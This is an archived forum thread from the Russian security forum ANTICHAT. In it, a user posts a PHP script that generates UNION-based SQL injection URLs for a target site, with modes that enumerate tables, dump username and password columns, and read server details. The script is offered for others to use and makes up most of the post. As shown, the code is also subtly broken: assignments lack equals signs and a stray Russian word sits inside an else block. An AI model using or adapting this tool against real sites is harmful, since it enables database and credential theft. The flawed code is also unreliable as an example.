ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу Удобный скрипт для sql-inj
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

[php]Удобный скрипт для sql-inj
  #1  
Старый 03.07.2008, 06:23
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию [php]Удобный скрипт для sql-inj
Иногда бывает, что при работе с sql-инъекциями таблица содержит большое количество колонок (например 150) и вводить руками это будет сложновато.. поэтому написал для себя скрипт облегчающий задачу...
PHP код:
<?php
$host 'www.site.com'#adress attacking of server (www.site.com)
$path 'index.php?id='#path to vulnerabity script with injection argument (shop/shop.php?id=)
$rows 9#number of rows
$printrow 5#printable row
$mode 'stat'#inform - dump information from information_schema; dump - dump information from interesting table; stat - information about MySQL-server (version(), user(), database())
$columns 'user,0x3a,password'#name of interesting columns, separated with 0x3a
$database 'user'#name of interesting
$end '/*'#end of query ('/*' or '--')

$query "$host/$path-1+union+select+";
switch ($mode)
{
    case "inform":
        for($i=1;$i<$rows+1;$i++) {
            if($i==$printrow) {
                $query .= 'concat(0x7c3a7c3a,table_name,0x3a7c3a7c),';
            } elseif($i==$rows) {
                $query .= $i;
            } else {
                $query .=  $i.',';
        }
        
    }
    $query .= "+from+information_schema.tables";
    break;
    
    case "dump":
        for($i=1;$i<$rows+1;$i++) {
            if($i==$printrow) {
                $query .= 'concat(0x7c3a7c3a,'.$columns.'),';
            } elseif($i==$rows) {
                $query .= $i;
            } else { 
                $query .= $i.',';
            }
        }
    $query .= "+from+$database";
    break;

    case "stat":
                for($i=1;$i<$rows+1;$i++) {
            if($i==$printrow) {
                $query .= 'concat(0x7c3a7c3a,version(),0x3a3a,user(),0x3a3a,database(),0x3a7c3a7c),';
            } elseif($i==$rows) {
                $query .= $i;
            } else {написал
                $query .=  $i.',';
        }
    }
    break;
}
$query .= $end;
echo "$query\n";
?>
внутри скрипта описано для чего, что и как используется.. юзайте наздоровье=)
Последний раз редактировалось gisTy; 03.07.2008 в 08:03..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Инъекции m0nzt3r Уязвимости 12414 17.06.2010 21:21
Фаерволы baltazar Защита ОС: вирусы, антивирусы, файрволы. 11 03.07.2008 15:56
Инструменты сетевой безопасности baltazar Soft - Windows 2 20.05.2008 23:03
Софт для шифрования данных baltazar Soft - Windows 2 19.05.2008 07:51
Основные команды командной строчки. silveran Windows 5 27.10.2005 14:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ